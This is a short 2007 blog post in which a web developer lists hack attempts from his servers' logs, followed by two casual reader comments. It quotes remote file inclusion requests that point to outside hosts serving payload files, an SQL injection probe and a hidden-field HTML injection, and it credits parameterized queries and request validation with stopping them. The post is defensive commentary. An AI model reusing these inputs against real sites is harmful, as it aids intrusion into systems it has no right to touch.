July 2, 2007

Web Hackers

You've got to love some of the hacks that people try to do on the net. I've actually been amazed by the sheer quantity of hacks against our servers at work. Fortunately, the vast majority of them have been from idiots.

For example, these attempts:

/Blog/Pastblogs.aspx?CustomerID=1123249/admin/includes/admin_header.php?level=http://www.solidarite-sida.org/test/echo.txt?

/Blog/Pastblogs.aspx?CustomerID=1123249/admin/includes/author_panel_header.php?level=http://www.the-esao.com/imag/stringa.txt?

/Blog/Pastblogs.aspx?CustomerID=1123249/admin/includes/author_panel_header.php?level=http://www.solidarite-sida.org/test/echo.txt?

Yes, because PHP includes work so well on an ASP.NET site...

Then there are the SQL injection attempts:

/wiki/wiki_content.aspx?wikiid=102'%20and%201=1%20and%20''='

I'm glad we used parameterized queries or stored procedures only...

Then there's hidden field injection:

A potentially dangerous Request.Form value was
detected from the client (hidCustomer="<a href="http://vfaxf...">).


Stuff like this is why I prefer not to disable HttpRequestValidationException. It's also why I'm trying to phase out hidden fields.

Any funky hacks that you guys have been seeing lately?

2 comments:

Sarkie said...

Can you add a few < /br> or fix it for really long lines, please Mr Rom. :)


Also, no one cares about our client's sites yet for them to try.

I initially thought you were going to post about MS.co.uk SQL injection hack.


The only successful injection on any page, was by you Mike, cos you're an ass!

Dave :0

Sarkie said...

Meh, its a Firefox Issue, Makes a change. :)